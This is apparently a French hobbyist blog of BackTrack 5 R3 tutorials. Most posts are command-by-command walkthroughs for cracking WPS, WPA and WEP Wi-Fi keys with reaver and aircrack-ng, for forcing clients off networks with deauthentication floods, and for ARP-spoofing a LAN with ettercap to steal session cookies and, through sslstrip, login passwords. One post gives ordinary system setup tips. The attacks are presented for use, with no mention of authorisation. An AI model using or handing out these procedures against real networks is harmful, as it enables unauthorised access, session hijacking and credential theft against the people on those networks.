acebook

Pages

Affichage des articles dont le libellé est Backtrack. Afficher tous les articles
Affichage des articles dont le libellé est Backtrack. Afficher tous les articles

mardi 26 novembre 2013

[Backtrack 5 R3] Crack WPA avec Reaver

 La fonction WPS (WiFi Protected Setup), permet de connecter simplement un équipement compatible au réseau wifi de votre box.
Crack Faille WPS avec Reaver 

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz) 
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi 
airodump-ng mon0
ou
wash -i mon0 -C
3.Attaque WPS
reaver -i mon0 -b AP-MAC -c 5 -vv

Il faut entre 6h et 30h cela dépend de la protection de la box.


[Backtrack 5 R3] Cookie Cadger Récupérer Cookies



Cookie Cadger
Cookie Cadger
Avec Backtrack 5 R3

Pour récupérer des cookies lorsque qu'un utilisateur est connecté sur une page,
j'utilise CookieCadger disponible à cette adresse https://www.cookiecadger.com
Utilisation de CookieCadger 
On va utiliser "Ettercap" pour capturer les paquets du réseau LAN.
Dans un terminal tapez : 
ettercap -T -M arp // //  
(capture tout le réseau)
Optionnel:
ettercap -Tq -M arp:remote -i eth0 /192.168.1.1/ /192.168.1.35/ 
(capture uniquement l'adresse 192.168.1.35)

-- Pour capturer en wifi rajouter l'inferface avec -i wlan0 --
ettercap -T -M arp // // -i wlan0

Lancez dans un autre terminal :
java -jar CookieCadger-1.06.jar
Sélectionnez votre interface
Start Capture on "eth0"
Dans Filter Domains les cookies des sites récupérés
Cliquez sur un site et faites Load Domain Cookies
Vous avez récupérez la session du site :-)

Enjoy !


[Backtrack 5 R3] Yamas Récupérer Passwords

 
Yamas : Récupérer Passwords
Avec Backtrack 5 R3
Pour récupérer des mots de passes lorsque qu'un utilisateur se logue uniquement,
 j'utilise le script Yamas disponible à cette adresse http://comax.fr/yamas.php.
J'ai du le modifié car le chemin pour ssltrip était faux.
Dans le script au lieu de /usr/bin/sslstrip j'ai remplacé par
/pentest/web/sslstrip/sslstrip.py

Donc dans un premier temps vérifiez ou se trouve sslstrip.


Installation de Yamas
Mettez le dans le répertoire "root"
Dans un terminal tapez : bash yamas.sh
Maintenant il est installé dans /usr/bin/yamas

Utilisation de Yamas
Dans un terminal tapez : yamas
Validez par ENTRER à chaque fois (par default)
Sur un autre PC loguez-vous a un site
Dans la fenêtre Passwords vous verrez les MDP de certains sites
(exemple : facebook,google,youtube ne fonctionnent plus)
Pour sauvegarder faites : 6
Puis Y.
Sauvegarde : /root/yamas.pass.txt

Supprimer Yamas 
(Permet de refaire une installation propre)
Dans un terminal tapez : rm /usr/bin/yamas



Enjoy !

mercredi 20 novembre 2013

[Backtrack 5 R3] Astuces


Astuces Backtrack 5 R3


1 - Login/Startx automatique

Ouvrir un terminal et tapez :
apt-get install rungetty

nano /etc/init/tty1.conf

Modifiez le fichier tty1.conf comme ci-dessous


Ctrl O
pour enregistrez puis Ctrl X.

Réouvrir un terminal et tapez :
nano ~/.bash_profile

(pour faire le tilde faites [Alt Gr]+[2])

Ajouter startx comme ci-dessous


Ctrl O
pour enregistrez puis Ctrl X.

Voilà maintenant tout est automatique ! 

 

2 - Backtrack KDE en Français

Mettre le clavier en FR :
setxkbmap fr

 

Ouvrir un terminal et tapez :
apt-get install language-selector-qt
apt-get install language-pack-kde-fr

apt-get install language-support-fr

Menu backtrack > setting > system settings > locale

"add language" > "french" > "apply"

Cliquez sur Installer une nouvelle langue

Sélectionnez French puis install.

Voilà Backtrack en français !  

 

3 - Windows 7 en boot par default

Ouvrir un terminal et tapez :
apt-get install startupmanager

startupmanager
Sélectionnez ensuite Windows 7

Windows 7 est maintenant le boot par default ! 

 

4 - Eteindre ou Redémarrer le Pc

Ouvrir un terminal et tapez :
redémarrez:
reboot
éteindre: poweroff 

 

5 - Mettre à jour Backtrack

Ouvrir un terminal et tapez :
apt-get update
apt-get upgrade
apt-get dist-upgrade 

 

6 - Executer un Scrip Shell

Créer un fichier texte avec le contenu de votre script
Renommez le avec l'extension .sh
Faites Clic-Droit dessus puis Proriétés
Onglet Droits d'accès
Cocher "est exécutable"

 

Pour le voir dans un terminal 

Ouvrir un terminal et tapez :
bash votrescript

 

7 - Problème avec Wicd's D-Bus

Ouvrir un terminal et tapez :
dpkg-reconfigure wicd
update-rc.d wicd defaults
/etc/init.d/wicd start

 

8 - Firefox en Français

J'ai mis à jour en dernière version le firefox d'origine:
Aide > A propos de Firefox
Pour mettre firefox en français j'ai téléchargé la dernière version linux :
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/latest/linux-x86_64/fr/
Ensuite dans Backtrack le dossier Firefox se situe:
/opt/firefox
Puis j'ai remplacé uniquement les fichiers dans l'emplacement principal,je n'ai pas remplacé les dossiers browser,components..etc..
Et c'est comme ça que j'ai eu Firefox en français ! :-)

Pour simplifier j'ai fait une archive firefox-fr-backtrack.7z,
vous n'avez plus qu'à mettre la version d'origine à jour et remplacer le dossier /opt/firefox.

9 - Désactiver les sons

Configuration du système → Notifications des applications et du système
→ Gérer les notifications → Onglet Applications →
Source de l'événement : Espace de travail KDE.

10 - Installer client Bitorrent (Deluge)

 apt-get install deluge
Pour ouvrir un .torrent avec firefox directement dans deluge,faites ouvrir avec et allez dans usr/bin/ et choisissez deluge.

11 - Installer VLC

Ouvrir un terminal et tapez :
apt-get install vlc
vi /usr/bin/vlc
:%s/geteuid/getppid/ puis ENTRER
:w puis ENTRER

 

Enjoy !

mercredi 8 avril 2009

[Backtrack 5 R3] Crack WPA Avec Dico

Aircrack-ng
CRACK WPA Avec Dico

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz) 
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi
airodump-ng mon0

3.Capturer le handshake
airodump-ng -c 6 -w capture -- encrypt wpa mon0
aireplay-ng -0 1 -e ESSID mon0

4.Crack avec Dico
aircrack-ng -w dico.txt *.cap

5.Supprimer les fichiers .cap .xor etc...
 Sauvegardez rm dans "root"
Dans un terminal tapez:
bash rm


Autre façon pour forcer l'utilisateur à se déconnecter:
aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC mon0
aireplay-ng -0 0 -a AP_MAC mon0

samedi 4 avril 2009

[Backtrack 5 R3] Aircrack-ng Crack WEP

Aircrack-ng

CRACK WEP

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz) 
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi
airodump-ng mon0

3.Capturer les paquets (changer le canal,ici le 6)
airodump-ng -c 6 -w capture -- encrypt wep mon0

---------------
 Ensuite 2 méthodes:

Méthode 1
ARP-Request 

Fake authentication with AP (-1)
aireplay-ng -1 1 -e ESSID mon0

ARP-request replay (-3)
aireplay-ng -3 -e ESSID mon0

Si une station est présente,utiliser
Deauthenticate Stations (-0)
aireplay-ng -0 1 -e ESSID mon0

--

Méthode 2
Chopchop WEP Packet

Fake authentication with AP (-1)
aireplay-ng -1 1 -e ESSID mon0

decrypt/chopchop WEP packet (-4)
aireplay-ng -4 -e ESSID -h @MacCarteWifi mon0

packetforge-ng -0 -a BSSID -h @MacCarteWifi
-k 255.255.255.255 -l 255.255.255.255
-y replay-obtenu.xor -w arp.cap

aireplay-ng -2 -r arp.cap -h @MacCarteWifi mon0


---------------

4.Crack
aircrack-ng -z *.cap

5.Supprimer les fichiers .cap .xor etc...
 Sauvegardez rm dans "root"
Dans un terminal tapez:
bash rm